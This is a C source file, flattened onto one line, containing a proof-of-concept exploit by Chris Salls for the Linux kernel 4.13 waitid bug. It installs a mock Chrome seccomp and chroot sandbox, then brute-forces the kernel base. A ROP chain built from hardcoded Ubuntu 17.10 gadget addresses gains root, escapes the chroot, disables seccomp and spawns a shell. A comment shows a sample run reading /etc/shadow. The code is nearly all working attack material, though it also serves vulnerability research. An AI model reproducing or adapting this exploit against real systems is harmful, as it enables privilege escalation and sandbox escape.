// Proof of concept exploit for waitid bug introduced in Linux Kernel 4.13 // By Chris Salls (twitter.com/chris_salls) // This exploit can be used to break out out of sandboxes such as that in google chrome // In this proof of concept we install the seccomp filter from chrome as well as a chroot, // then break out of those and get root // Bypasses smep, but not smap // offsets written and tested on ubuntu 17.10-beta2 /* salls@ubuntu:~/x$ uname -a Linux ubuntu 4.13.0-12-generic #13-Ubuntu SMP Sat Sep 23 03:40:16 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux salls@ubuntu:~/x$ gcc poc.c -lpthread -o poc salls@ubuntu:~/x$ ./poc Installed sandboxes. Seccomp, chroot, uid namespace found kernel base 0xffffffff95200000 # id uid=0(root) gid=0(root) groups=0(root) # head /etc/shadow root:!:17447:0:99999:7::: daemon:*:17435:0:99999:7::: */ /****** overview of exploit ******** waitid uses unsafe_put_user without checking access_ok, allowing the user to give a kernel address for infop and write over kernel memory. when given invalid parameters this just writes the following 32 bit integers 0, 0, 0, _, 0, 0, 0 (the 4th element is unchanged) inside the chrome sandbox we cannot fork (can only make threads) so we can only give invalid parameters to waitid and only write 0's to kernel memory, I start out by iteratively calling waitid until we find the kernel's base address When it's found it will not return efault error from the syscall Then I overwrite the upper bytes of a cgroup pointer with 0's to point it to userland Then when calling clone() it will call the cgroup fork() handler which we control I pivot the stack and use a rop chain to get root and remove the chroot */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /******** constants for the sandboxing *********/ #define PR_SET_NO_NEW_PRIVS 38 #define __NR_seccomp 317 #define SECCOMP_SET_MODE_FILTER 1 /************ task offsets *************/ // from prctl_get_seccomp #define OFFSET_OF_SECCOMP_MODE 2920 #define OFFSET_OF_SECCOMP 2928 // from sys_getcwd #define OFFSET_OF_FS 2784 // from put_task_stack #define OFFSET_OF_STACK 0x40 // flag for seccomp #define OFFSET_OF_TIF_SECCOMP 1 /********** global offsets *************/ #define KERNEL_BASE_DEFAULT 0xFFFFFFFF81000000 #define CGROUP_SUBSYS 0xffffffff81ee7e60 #define FIRST_CGROUP 0xffffffff81ee98a0 #define PREPARE_KERNEL_CRED 0xffffffff810a8480 #define COMMIT_CREDS 0xffffffff810a80f0 #define INIT_TASK 0xffffffff81e10480 #define INIT_FS 0xffffffff81f23480 // 4.13+ // current sources of unreliability // addresses we guess seem to be suboptimal // can spray more or try better guesses // just look at end_rodata_hpage_align // where read/write data is in kernel // had to play with last 3 nibbles to get it to not crash #define start_rw_off 0x9f5fe0 /****** ROP GADGETS ********/ // a pivot. xchg esp, eax; ret; #define STACK_PIVOT 0xffffffff8101e773 #define INCREASE_RSP_0x60 0xffffffff811465e6 // mov [rsi], rdx; ret #define STORE_RDX_RSI_RET 0xFFFFFFFF81039D38 #define POP_RSI_RBP_RET 0xffffffff81130818 #define POP_RDX_RBP_RET 0xffffffff8105f2be // mov rdi, rax; call rdx #define MOV_RDI_RAX_CALL_RDX 0xffffffff818e57b2 #define POP_RBP_RET 0xFFFFFFFF818E57B7 #define POP_RDI_RET 0xffffffff8162fdfd #define POP_RAX_RET 0xffffffff81626ab7 #define ADD_RAX_RDX_RET 0xffffffff810b4a2d // mov [rax], rdi; pop rbp; ret #define STORE_RDI_RAX_PRET 0xffffffff811e2165 // mov [rdi], rax; ret // must not clobber rax #define STORE_RAX_RDI_RET 0xffffffff81415500 // mov rax, [rax]; pop rbp; ret #define READ_RAX_RAX_PRET 0xffffffff811214a0 // and rax, rdx; pop rbp; ret #define AND_RAX_RDX_PRET 0xffffffff81462928 // add rax,[rdi+0x88]; pop rbp; ret; #define ADD_RAX_READ_RDI_PRET 0xFFFFFFFF8154D277 #define POP_RSP_RET 0xffffffff81190d84 #define CGROUP_POST_FORK_PROLOGUE 0xFFFFFFFF811285AC #define STORE_BYTE_ZERO_RAX_PRET 0xFFFFFFFF810F1D2A // CURRENT gs:off_D300 // in ata_eh_acquire // mov rdx, gs:off_D300; mov [rax+58h], rdx; pop rbx; pop rbp; #define GET_CURRENT 0xFFFFFFFF816743AB /******** cgroups that we need to restore ********/ #define cgroup_1 0xFFFFFFFF81EE98A0 #define cgroup_2 0xFFFFFFFF81E590C0 #define cgroup_3 0xFFFFFFFF81E5ED60 #define cgroup_4 0xFFFFFFFF81F6DA60 unsigned long kernel_base; unsigned long REBASE(unsigned long X) { return X-KERNEL_BASE_DEFAULT+kernel_base; } /********** HELPERS *************/ int write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; size_t len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) { perror("open"); return 0; } if (write(fd, buf, len) != len) { close(fd); return 0; } close(fd); return 1; } /******** mock chrome sandbox **********/ void install_mock_chrome_sandbox() { char *buffer = NULL; long length; FILE *f = fopen ("chrome_seccomp_filter", "rb"); if (f) { fseek(f, 0, SEEK_END); length = ftell (f); fseek(f, 0, SEEK_SET); buffer = (char*)malloc(length); if (buffer) { fread(buffer, 1, length, f); } fclose(f); } else { printf("couldn't open chrome_seccomp_filter\n"); exit(-1); } if (length%8 != 0) { printf("length mod 8 != 0?\n"); exit(-1); } // set up namespace int real_uid = 1000; int real_gid = 1000; int has_newuser = 1; if (unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); printf("no new user...\n"); has_newuser = 0; } if (unshare(CLONE_NEWNET) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/setgroups", "deny")) { perror("write_file(/proc/self/set_groups)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/uid_map", "1000 %d 1\n", real_uid)){ perror("write_file(/proc/self/uid_map)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/gid_map", "1000 %d 1\n", real_gid)) { perror("write_file(/proc/self/gid_map)"); exit(EXIT_FAILURE); } // chroot if (chroot("/proc/self/fdinfo")) { perror("chroot"); exit(EXIT_FAILURE); } // set uid if (!has_newuser){ if (setgid(1000)) { perror("setgid"); exit(EXIT_FAILURE); } if (setuid(1000)) { perror("setuid"); exit(EXIT_FAILURE); } } // no new privs int res = prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); if (res) { printf("no new privs failed? %d\n", res); } // filter struct sock_fprog prog = { .len = (unsigned short) (length/8), .filter = (struct sock_filter*)buffer, }; // install filter if (syscall(__NR_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog)) { perror("seccomp"); exit(-2); } printf("Installed sandboxes. Seccomp, chroot, uid namespace\n"); } /***********EXPLOIT CODE************/ unsigned long get_base() { // first we try doing our arb write to find the system base address // if syscall is 0 we didn't fault unsigned long start = 0xffffffff00000000; unsigned long inc = 0x0000000000100000; unsigned long guess = start; while (guess != 0) { syscall(SYS_waitid, P_ALL, 0, guess+start_rw_off, WEXITED, NULL); if (errno != 14) { printf("found kernel base 0x%lx\n", guess); kernel_base = guess; return guess; } guess += inc; } printf("failed to find base address..."); return -1; } void create_rop(unsigned long *addr) { unsigned long current_val = 0; unsigned long rax_val = 0; unsigned long ROP[] = { // save rax which has lower 32 bits of rsp in it REBASE(POP_RDI_RET), (unsigned long)&rax_val, REBASE(STORE_RAX_RDI_RET), // fix up cgroup // cgroup 1 REBASE(POP_RSI_RBP_RET), REBASE(CGROUP_SUBSYS), 0x42424242, REBASE(POP_RDX_RBP_RET), REBASE(cgroup_1), 0x42424242, REBASE(STORE_RDX_RSI_RET), // cgroup 2 REBASE(POP_RSI_RBP_RET), REBASE(CGROUP_SUBSYS+8), 0x42424242, REBASE(POP_RDX_RBP_RET), REBASE(cgroup_2), 0x42424242, REBASE(STORE_RDX_RSI_RET), // cgroup 3 REBASE(POP_RSI_RBP_RET), REBASE(CGROUP_SUBSYS+16), 0x42424242, REBASE(POP_RDX_RBP_RET), REBASE(cgroup_3), 0x42424242, REBASE(STORE_RDX_RSI_RET), // cgroup 4 REBASE(POP_RSI_RBP_RET), REBASE(CGROUP_SUBSYS+24), 0x42424242, REBASE(POP_RDX_RBP_RET), REBASE(cgroup_4), 0x42424242, REBASE(STORE_RDX_RSI_RET), // get root REBASE(POP_RDI_RET), 0, REBASE(PREPARE_KERNEL_CRED), // set rdx for the mov rdi, rdx; call rdx gadget REBASE(POP_RDX_RBP_RET), REBASE(POP_RBP_RET), 0x42424242, REBASE(MOV_RDI_RAX_CALL_RDX), REBASE(COMMIT_CREDS), // escape the chroot (copy init process fs) // get current REBASE(POP_RAX_RET), (unsigned long)((¤t_val))-0x58, REBASE(GET_CURRENT), // current is now in rdx 0x42424242, 0x42424242, REBASE(POP_RAX_RET), OFFSET_OF_FS, REBASE(ADD_RAX_RDX_RET), // rax now points to my fs REBASE(POP_RDI_RET), REBASE(INIT_FS), // rdi points to init fs // change my fs REBASE(STORE_RDI_RAX_PRET), 0x42424242, // disable seccomp REBASE(POP_RAX_RET), OFFSET_OF_SECCOMP_MODE, REBASE(ADD_RAX_RDX_RET), // rax now points to seccomp mode REBASE(POP_RDI_RET), 0, REBASE(STORE_RDI_RAX_PRET), 0x42424242, REBASE(POP_RAX_RET), OFFSET_OF_SECCOMP, REBASE(ADD_RAX_RDX_RET), // rax now points to seccomp REBASE(POP_RDI_RET), 0, REBASE(STORE_RDI_RAX_PRET), 0x42424242, REBASE(POP_RAX_RET), OFFSET_OF_TIF_SECCOMP, REBASE(ADD_RAX_RDX_RET), // rax now points to flag with seccomp enabled REBASE(STORE_BYTE_ZERO_RAX_PRET), 0x42424242, // now we can return // restore rsp from saved_eax+(current->stack)&0xffffffff00000000 // grab stack pointer from current REBASE(POP_RAX_RET), OFFSET_OF_STACK, REBASE(ADD_RAX_RDX_RET), // rax now points to &task->stack REBASE(READ_RAX_RAX_PRET), // rax is now the stack pointer from task 0x42424242, // & 0xffffffff00000000 REBASE(POP_RDX_RBP_RET), 0xffffffff00000000, 0x42424242, REBASE(AND_RAX_RDX_PRET), // rax = stack&0xffffffff00000000 0x42424242, REBASE(POP_RDI_RET), ((unsigned long)&rax_val)-0x88, // sub 0x88 since it's read [rdi+0x88] REBASE(ADD_RAX_READ_RDI_PRET), // rax should be equal to our original stack value 0x42424242, // and overwrite the popped rsp value at marker REBASE(POP_RDI_RET), 0x66666666, // address of marker REBASE(STORE_RAX_RDI_RET), // edit return address in rsp to skip to prologue (since rbp is broken) REBASE(POP_RDI_RET), REBASE(CGROUP_POST_FORK_PROLOGUE), REBASE(STORE_RDI_RAX_PRET), 0x42424242, // now return to kernel REBASE(POP_RSP_RET), 0x77777777, // marker }; unsigned long i = 0; for(i = 0; i < sizeof(ROP)/8; i++) { addr[i] = ROP[i]; } // set up marker addr[sizeof(ROP)/8-8] = (unsigned long)&addr[sizeof(ROP)/8-1]; unsigned long end = i+10; for(; i < end; i++) { addr[i] = 0x4141414141; } } void *empty_thread(void *arg) { return NULL; } void do_exploit() { // mmap the userland address where the pointer will be after the partial overwrite unsigned long cgroup_base = 0xffffff&REBASE(FIRST_CGROUP); long* addr = (long*)mmap((void*)(cgroup_base&0xfff000), 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); if(addr == (void*)-1) { printf("mmap failed\n"); exit(-1); } // set up the fake cgroup fork call *(unsigned long*)(cgroup_base+0x60) = REBASE(STACK_PIVOT); // skip over the stack pivot at offst 0x60 *(unsigned long*)(cgroup_base) = REBASE(INCREASE_RSP_0x60); // set up a rop chain create_rop((unsigned long*)(cgroup_base+0x68)); printf("Executing rop chain\n"); // overwrite upper 5 bytes of the first cgroup subsys pointer // we will fix the cgroup pointers in the rop chain syscall(SYS_waitid, P_ALL, 0, REBASE(CGROUP_SUBSYS)+3, WEXITED, NULL); // now trigger cgroup fork to execute the rop chain pthread_t th1; pthread_create(&th1, NULL, empty_thread, NULL); // now we should be root printf("Should be root\n"); system("/bin/sh"); } int main() { install_mock_chrome_sandbox(); setvbuf(stdout, NULL, _IONBF, 0); long ret = get_base(); if (ret == -1) { printf("failed to get kernel base address\n"); return -1; } do_exploit(); return 0; }